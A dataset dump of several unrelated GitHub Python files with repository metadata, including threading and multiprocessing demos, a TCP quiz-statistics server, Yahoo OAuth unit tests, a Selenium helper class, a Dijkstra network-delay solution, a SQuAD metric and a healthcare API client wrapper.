'fasttext', 'cc.en.300.bin')) logging.info('accomodtion' in ft.words) logging.info(f"与accomodtion最相似的5个词为: {ft.get_nearest_neighbors('accomodation', k=5)}") logging.info(ft.get_analogies("berlin", "germany", "france", k=5)) # False # 与accomodtion最相似的5个词为: [(0.858731, 'accomadation'), (0.828016, 'acommodation'), (0.822644, 'accommodation'), (0.821873, 'accomdation'), (0.793275, 'Accomodation')] # [(0.730373, 'paris'), (0.640853, 'france.'), (0.639331, 'avignon'), (0.631667, 'paris.'), (0.589559, 'montpellier')] if __name__ == '__main__': # load_fasttext_model() get_get_analogies()
moon-hotel/DeepLearningWithMe
Code/Chapter09/C05_FastText/main.py
main.py
py
2,582
python
en
code
116
github-code
6
75386038906
import threading import time def worker(): count = 0 while True: if (count >= 5): # raise RuntimeError() break time.sleep(1) print("I'm working") count += 1 t = threading.Thread(target=worker, name='worker') # 线程对象. t.start() # 启动. print("==End==")
hashboy1/python
MultiThread.py
MultiThread.py
py
332
python
en
code
0
github-code
6
45626436566
import threading import socket class Estatisticas: def __init__(self): self.questoes = {} def atualizar_estatisticas(self, num_questao, acertos, erros): self.questoes[num_questao] = {'acertos': acertos, 'erros': erros} def obter_estatisticas(self): return self.questoes def tratar_conexao(conn, addr, estatisticas): print("Cliente conectado:", addr) while True: data = conn.recv(1024).decode() if not data: break num_questao, _, respostas = data.split(";") acertos, erros = calcular_acertos_erros(respostas) estatisticas.atualizar_estatisticas(num_questao, acertos, erros) resposta = f"Questão: {num_questao}; Acertos: {acertos}; Erros: {erros}" conn.send(resposta.encode()) print("Cliente desconectado:", addr) conn.close() def calcular_acertos_erros(respostas): acertos = respostas.count('V') erros = respostas.count('F') return acertos, erros def iniciar_servidor(host, port): estatisticas = Estatisticas() servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM) servidor.bind((host, port)) servidor.listen(5) print("Servidor iniciado. Aguardando conexões...") while True: conn, addr = servidor.accept() thread = threading.Thread(target=tratar_conexao, args=(conn, addr, estatisticas)) thread.start() if __name__ == "__main__": host = "127.0.0.1" port = 8888 iniciar_servidor(host, port)
GabsLUZ/Atividade-SD
TCP/servidor.py
servidor.py
py
1,552
python
pt
code
0
github-code
6
8665774694
import os import json from botocore.exceptions import ClientError from unittest import TestCase from unittest.mock import patch from exceptions import YahooOauthError from login_yahoo_authorization_url import LoginYahooAuthorizationUrl class TestLoginYahooAuthorizationUrl(TestCase): @classmethod def setUpClass(cls): os.environ['YAHOO_CLIENT_ID'] = 'fake_yahoo_consumer_key' os.environ['YAHOO_SECRET'] = 'fake_yahoo_consumer_secret' os.environ['YAHOO_OAUTH_CALLBACK_URL'] = 'http://localhost' def test_exec_main_ok(self): with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock: yahoo_mock.return_value.get_authorization_url.return_value = 'oauth_url' response = LoginYahooAuthorizationUrl({}, {}).main() self.assertEqual(response['statusCode'], 200) self.assertEqual( json.loads(response['body']), {'url': 'oauth_url'} ) def test_exec_main_ng_with_clienterror(self): with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock: yahoo_mock.return_value.generate_auth_url.side_effect = ClientError( {'Error': {'Code': 'UserNotFoundException'}}, 'operation_name' ) response = LoginYahooAuthorizationUrl({}, {}).main() self.assertEqual(response['statusCode'], 500) self.assertEqual( json.loads(response['body']), {'message': 'Internal server error: LoginYahooAuthorizationUrl'} ) def test_exec_main_ng_with_yahoo(self): with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock: yahoo_mock.return_value.generate_auth_url.side_effect = YahooOauthError( endpoint='http://example.com', status_code=400, message='error' ) response = LoginYahooAuthorizationUrl({}, {}).main() self.assertEqual(response['statusCode'], 500) self.assertEqual( json.loads(response['body']), {'message': 'Internal server error: LoginYahooAuthorizationUrl'} )
AlisProject/serverless-application
tests/handlers/login/yahoo/authorization_url/test_login_yahoo_authorization_url.py
test_login_yahoo_authorization_url.py
py
2,213
python
en
code
54
github-code
6
2668239466
import multiprocessing from time import ctime def consumer(input_q): print("Into consumer:",ctime()) while True: # 处理项 item = input_q.get() print ("pull",itemm,"out of q")#此处代替为有用的工作 input_q.tast_done()#发出信号通知任务完成 print("Out of consumer:",ctime())##此句末执行,因为q.join()信号后,主进程启动,为等到print此语句完 def prodeuce(sequence,out_q): print("Inpo producer ",ctime()) for item in sequence: output_q.put(item) print("put",item,"into q") print("Out of producer",ctime()) if __name__ == '__main__': q = multiprocessing.JoinableQueue() #运行消费者进程 cons_p = multiprocessing.Process(target= consumer, args = (q,1)) cons_p.daemon = True cons_p.start() #在生产多个项,sqeuence代表要发送个消费者的项的序列 #在实践中,这可能是生成器的输出或通过一些其他生产方式出来 sequence = [1,2,3,4] prodeuce(sequence,q) q.join()
Sssssww/pycharm
多线程/22.py
22.py
py
1,065
python
en
code
0
github-code
6
23391926789
from selenium import webdriver from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.by import By import json from pathlib import Path from time import sleep from selm.gales import settings class Gale(): def __init__(self, implicitly_wait=12): option = webdriver.ChromeOptions() # 防止打印一些无用的日志 option.add_experimental_option( "excludeSwitches", ['enable-automation', 'enable-logging']) # 初始化driver self.driver = webdriver.Chrome(options=option) # 设置浏览器窗口大小 # self.driver.maximize_window() self.driver.set_window_rect(-7, 0, 1190, 1047) # 设置隐性等待时间 self.driver.implicitly_wait(implicitly_wait) def get_url(self, url: str): '''页面访问 Args: url (str): url地址 ''' self.driver.get(url) def get_url_by_cookies(self, url: str, cookies_path: Path): '''带cookies的页面访问 Args: url (str): 登录网址 cookies_path (Path): cookies储存地址 ''' self.get_url(url) cookies = json.loads(open(cookies_path).read()) for c in cookies: self.driver.add_cookie(c) self.get_url(url) # self.driver.refresh() def get_cookies(self, url: str, file_path: Path, user_data: dict, input_time: int = 12): '''获取cookies Args: url (str): 登录网址 file_path (Path): cookies储存路径 user_data (dict): 用户登录数据 { "账号":(css_selector, str), "密码":(css_selector, str), ... "login": css_selector } input_time (int, optional): Defaults to 12. 用户输入验证码的时间 ''' self.get_url(url) for i in user_data: if i == 'login': continue for selector, content in user_data[i]: self.find_by_selector(selector).send_keys(content) # button_cache.send_keys(content) # 等待用户手动输入验证码 sleep(input_time) self.find_by_selector(user_data["login"]).click() cookies = self.driver.get_cookies() with open(file_path, "w", encoding="utf-8") as f: f.write(json.dumps(cookies)) def find_by_id(self, id): '''通过id查找元素 Args: id (str): id路径 Returns: WebElement: WebElement对象 ''' return self.driver.find_element_by_id(id) def find_by_selector(self, selector): '''通过css属性查找webelement元素 Args: selector (str): css属性 Returns: WebElement: WebElement对象 ''' return self.driver.find_element_by_css_selector(selector) def find_by_xpath(self, xpath): '''通过xpath查找元素 Args: xpath (str): xpath路径 Returns: WebElement: WebElement对象 ''' return self.driver.find_element_by_xpath(xpath) def wait_clickable(self, ele_path, by="selector", time=10): '''等待元素可以被点击 ''' if by == "selector": return WebDriverWait(self.driver, time).until(EC.element_to_be_clickable( (By.CSS_SELECTOR, ele_path))) elif by == "xpath": return WebDriverWait(self.driver, time).until(EC.element_to_be_clickable( (By.XPATH, ele_path))) else: raise TypeError(f"not type {by}") def wait_presence(self, ele_path, by="selector", time=10): '''显性等待元素出现,如果元素在规定时间内出现就返回该元素 Args: ele_path (str): 与by对应的属性路径 by (str, optional): Defaults to "selector". [还可以是xpath等] time (int, optional): Defaults to 10. [默认的显性等待时间] Raises: TypeError: 不存在的by方法 Returns: WebElement: 如果元素在规定时间内被查找到则返回该元素WebElement对象 ''' if by == "selector": return WebDriverWait(self.driver, time).until(EC.presence_of_element_located( (By.CSS_SELECTOR, ele_path))) elif by == "xpath": return WebDriverWait(self.driver, time).until(EC.presence_of_element_located( (By.XPATH, ele_path))) else: raise TypeError(f"not type {by}") def wait_not_presence(self, ele_path, by="selector", time=10): '''等待元素不存在 ''' if by == "selector": return WebDriverWait(self.driver, time).until_not(EC.presence_of_element_located( (By.CSS_SELECTOR, ele_path))) elif by == "xpath": return WebDriverWait(self.driver, time).until_not(EC.presence_of_element_located( (By.XPATH, ele_path))) else: raise TypeError(f"not type {by}") def wait_visibility(self, ele_path, by="selector", time=10): '''等待元素对用户可见 ''' if by == "selector": return WebDriverWait(self.driver, time).until(EC.visibility_of_element_located( (By.CSS_SELECTOR, ele_path))) elif by == "xpath": return WebDriverWait(self.driver, time).until(EC.visibility_of_element_located( (By.XPATH, ele_path))) else: raise TypeError(f"not type {by}") def wait_invisibility(self, ele_path, by="selector", time=10): '''等待元素对用户不可见 ''' if by == "selector": return WebDriverWait(self.driver, time).until(EC.invisibility_of_element_located( (By.CSS_SELECTOR, ele_path))) elif by == "xpath": return WebDriverWait(self.driver, time).until(EC.invisibility_of_element_located( (By.XPATH, ele_path))) else: raise TypeError(f"not type {by}") def save2png(self, file_name): '''获取当前浏览器窗口屏幕截图 Args: file_name (str): 图片名(图片默认存放到data目录下) ''' file_path = settings.DATA_DIR / file_name self.driver.get_screenshot_as_file(str(file_path)) sleep(1) def close(self): '''关闭当前窗口 ''' self.driver.close() def quit(self): '''关闭整个浏览器 ''' self.driver.quit() def refresh(self): '''刷新 ''' self.driver.refresh()
tyutltf/xaioliangzatan
selm/gales/gale.py
gale.py
py
6,838
python
en
code
1
github-code
6
43634658293
from __future__ import division from __future__ import absolute_import #typing #overrides from allennlp.common import squad_eval from allennlp.training.metrics.metric import Metric class SquadEmAndF1(Metric): u""" This :class:`Metric` takes the best span string computed by a model, along with the answer strings labeled in the data, and computed exact match and F1 score using the official SQuAD evaluation script. """ def __init__(self) : self._total_em = 0.0 self._total_f1 = 0.0 self._count = 0 #overrides def __call__(self, best_span_string, answer_strings): u""" Parameters ---------- value : ``float`` The value to average. """ exact_match = squad_eval.metric_max_over_ground_truths( squad_eval.exact_match_score, best_span_string, answer_strings) f1_score = squad_eval.metric_max_over_ground_truths( squad_eval.f1_score, best_span_string, answer_strings) self._total_em += exact_match self._total_f1 += f1_score self._count += 1 #overrides def get_metric(self, reset = False) : u""" Returns ------- Average exact match and F1 score (in that order) as computed by the official SQuAD script over all inputs. """ exact_match = self._total_em / self._count if self._count > 0 else 0 f1_score = self._total_f1 / self._count if self._count > 0 else 0 if reset: self.reset() return exact_match, f1_score #overrides def reset(self): self._total_em = 0.0 self._total_f1 = 0.0 self._count = 0 def __str__(self): return "SquadEmAndF1(em={self._total_em}, f1={self._total_f1})" SquadEmAndF1 = Metric.register(u"squad")(SquadEmAndF1)
plasticityai/magnitude
pymagnitude/third_party/allennlp/training/metrics/squad_em_and_f1.py
squad_em_and_f1.py
py
1,963
python
en
code
1,607
github-code
6
41244754700
'''Faça um programa que leia três numeros e mostre qual é o maior e qual é o menor''' n1 = int(input('Digite um número: ')) n2 = int(input('Digite um número: ')) n3 = int(input('Digite um número: ')) maior = n1 if n2 > n1: maior = n2 if n3 > maior: maior = n3 menor = n1 if n2 < n1: menor = 2 if n3 < menor: menor = n3 print('maior: {} \nmenor: {}'.format(maior,menor)) ''' outra forma maior = menor = 0 numero = [] for n in range(0,3): numero.append(int(input(f'Digite o {n +1}º número: '))) numero.sort() print(f'Menor número: {numero[0]}') print(f'Maior número: {numero[-1]}')'''
andrematos90/Python
CursoEmVideo/Módulo 1/Desafio 033.py
Desafio 033.py
py
628
python
pt
code
0
github-code
6
13301338601
from bson.objectid import ObjectId from flask import Blueprint, jsonify from assets.extensions import mongo from assets.decors import errorhandler, tokenrequired accounts = Blueprint("accounts", __name__, url_prefix="/accounts") # STATUS @accounts.route("/<account_id>/status", methods=["GET"]) @tokenrequired @errorhandler def get_status(current_user, account_id): # query the user collection for account status accounts = mongo.db.users.find_one({"_id": ObjectId(current_user["_id"]["$oid"])})[ "Accounts"] if account_id in accounts: status = accounts[account_id]["Active"] return jsonify({"account_status": status, "account_id": account_id}), 200 return jsonify({"error": "invalid account id", "account_id": account_id}), 400 @accounts.route("/<account_id>/status", methods=["PUT"]) @tokenrequired @errorhandler def update_status(current_user, account_id): resp = mongo.db.users.update_one({"_id": ObjectId(current_user["_id"]["$oid"])}, [{"$set": {f"Accounts.{account_id}.Active": {"$eq": [False, f"$Accounts.{account_id}.Active"]}}}]) # if update did not occur because no account id found if resp.matched_count == 0 or resp.modified_count == 0: return jsonify({"error": "failed to update status", "account_id": account_id}), 400 return jsonify({"success": "status updated", "account_id": account_id}), 201
TreyThomas93/tos-python-web-app-server
api/accounts/__init__.py
__init__.py
py
1,434
python
en
code
0
github-code
6
14471424043
''' There are N network nodes, labelled 1 to N. Given times, a list of travel times as directed edges times[i] = (u, v, w), where u is the source node, v is the target node, and w is the time it takes for a signal to travel from source to target. Now, we send a signal from a certain node K. How long will it take for all nodes to receive the signal? If it is impossible, return -1. Example 1: Input: times = [[2,1,1],[2,3,1],[3,4,1]], N = 4, K = 2 Output: 2 Note: N will be in the range [1, 100]. K will be in the range [1, N]. The length of times will be in the range [1, 6000]. All edges times[i] = (u, v, w) will have 1 <= u, v <= N and 0 <= w <= 100. ''' # Dijkstra's heap O(E logE) time and O(N + E) space from collections import defaultdict from heapq import * class Solution: def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int: graph = defaultdict(list) for u, v, w in times: graph[u].append((w,v)) pq = [(0, K)] dist = {} while pq: d, node = heappop(pq) if node in dist: continue dist[node] = d for d2, nei in graph[node]: if nei not in dist: heappush(pq, (d+d2, nei)) return max(dist.values()) if len(dist) else -1 # Dijkstra's basic O(N**2 + E) and O(N + E) space from collections import defaultdict class Solution: def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int: graph = defaultdict(list) for u, v, w in times: graph[u].append((w,v)) dist = {node: float('inf') for node in range(1, N+1)} seen = [False] * (N+1) dist[K] = 0 while True: cand_node = -1 cand_dist = float('inf') for i in range(1, N+1): if not seen[i] and dist[i] < cand_dist: cand_dist = dist[i] cand_node = i if cand_node < 0: break seen[cand_node] = True for d, nei in graph[cand_node]: dist[nei] = min(dist[nei], dist[cand_node] + d) ans = max(dist.values()) return ans if ans < float('inf') else -1 # dfs O(N**N + ElogE) time and O(N + E) space from collections import defaultdict class Solution: def networkDelayTime(self, times: List[List[int]], N: int, K: int) -> int: graph = defaultdict(list) for u, v, w in times: graph[u].append((w,v)) dist = {node: float('inf') for node in range(1, N+1)} def dfs(node, elapsed): if elapsed >= dist[node]: return dist[node] = elapsed for time, nei in sorted(graph[node]): dfs(nei, elapsed + time) dfs(K, 0) ans = max(dist.values()) return ans if ans < float('inf') else -1
loganyu/leetcode
problems/743_network_delay_time.py
743_network_delay_time.py
py
3,027
python
en
code
0
github-code
6
40017302365
# import streamlit as st # import threading import time # # 定义共享变量 # is_running = True # # 定义线程函数 # def thread_function(): # a = 0 # st.text(f'in to thread') # global is_running # while is_running: # # 线程执行的逻辑 # a += 1 # st.text(a) # time.sleep(1) # st.text(f'out thread') # def stop(): # # 当需要停止线程时 # global is_running # if st.button('stop'): # is_running = False # if st.button('start'): # is_running = True # if __name__ == "__main__": # # 创建线程并启动 # thread = threading.Thread(target=thread_function) # thread.start() # stop() import threading # 定义共享变量 is_running = threading.Event() # 定义线程函数 def thread_function(): while not is_running.is_set(): # 线程执行的逻辑 print(1) # 当需要停止线程时 def stop(): is_running.set() if __name__ == "__main__": # 创建线程并启动 thread = threading.Thread(target=thread_function) thread.start() time.sleep(1) stop() stop_flag = threading.Event() def receive_data(): print(f'into receive data') while not stop_flag.is_set(): ser = serial.Serial(port, baud_rate, timeout=1) received_data = [] # List to store received data start_time = time.time() # Start time of data fetching inner_time = time.time() while not stop_flag.is_set(): data = ser.readline().decode().strip() # Read a line of data and remove whitespace elapsed_time = time.time() - start_time if data: print(data) received_data.append(data) inner_time = time.time() if time.time() - inner_time > timeout_seconds: print(f'Time out for: {elapsed_time}') break ser.close() end_time = time.time() - start_time # duration of one cycle # Save received data as a text file only if it has been fetched for more than 10 seconds if end_time >= fetch_duration_threshold: file_name = f"./temp/received_data.txt" # Save received data to a new text file with open(file_name, 'w') as file: file.write('\n'.join(received_data)) print('Finish one record') time.sleep(1) # Wait for 1 second before restarting the loop print(f'end receive.') def main(): model = get_model() # your drinked if st.checkbox("start receive"): # 创建 Thread 实例 t1 = Thread(target=receive_data) if st.button("start"): print(f'st') stop_flag.clear() # 启动线程运行 t1.start() # 等待所有线程执行完毕 if st.button("stop"): stop_flag.set() print(f'flag {stop_flag.is_set()}')
YuTheon/NUS_AIOT_web2
test.py
test.py
py
2,927
python
en
code
0
github-code
6
22425229606
import typing from pydantic import BaseModel, root_validator from candid import CandidApiEnvironment from candid.client import CandidApi, AsyncCandidApi from candid.resources.auth.client import AuthClient, AsyncAuthClient from candid.resources.auth.resources.v_2 import AuthGetTokenRequest from candid.resources.billing_notes.client import BillingNotesClient, AsyncBillingNotesClient from candid.resources.encounters.client import EncountersClient, AsyncEncountersClient from candid.resources.expected_network_status.client import ExpectedNetworkStatusClient, \ AsyncExpectedNetworkStatusClient from candid.resources.payers.client import PayersClient, AsyncPayersClient class CandidApiClientOptions(BaseModel): token: typing.Optional[str] client_id: typing.Optional[str] client_secret: typing.Optional[str] @root_validator(pre=False) def token_or_client_id_and_secret_present(cls, values): if values.get("token") is not None: return values elif values.get("client_id") is not None and values.get("client_secret") is not None: return values raise ValueError("Either token or client_id and client_secret must be provided") def get_token_for_options(options: CandidApiClientOptions, environment: CandidApiEnvironment) -> str: if options.token is not None: return options.token else: unauthed_client = CandidApi(environment=environment, token=None) response = unauthed_client.auth.v_2.get_token(request=AuthGetTokenRequest(client_id=options.client_id, client_secret=options.client_secret)) return response.access_token class CandidApiClient: def __init__( self, *, options: CandidApiClientOptions, environment: CandidApiEnvironment = CandidApiEnvironment.PRODUCTION ): candid = CandidApi(token=get_token_for_options(options, environment), environment=environment) self.auth = candid.auth self.encounters = candid.encounters self.billing_notes = candid.billing_notes self.expected_network_status = candid.expected_network_status self.payers = candid.payers class AsyncCandidApiClient: def __init__( self, *, options: CandidApiClientOptions, environment: CandidApiEnvironment = CandidApiEnvironment.PRODUCTION ): candid = AsyncCandidApi(token=get_token_for_options(options, environment), environment=environment) self.auth = candid.auth self.encounters = candid.encounters self.billing_notes = candid.billing_notes self.expected_network_status = candid.expected_network_status self.payers = candid.payers
candidhealth/candid-python
src/candid/candid_api_client.py
candid_api_client.py
py
2,650
python
en
code
0
github-code
6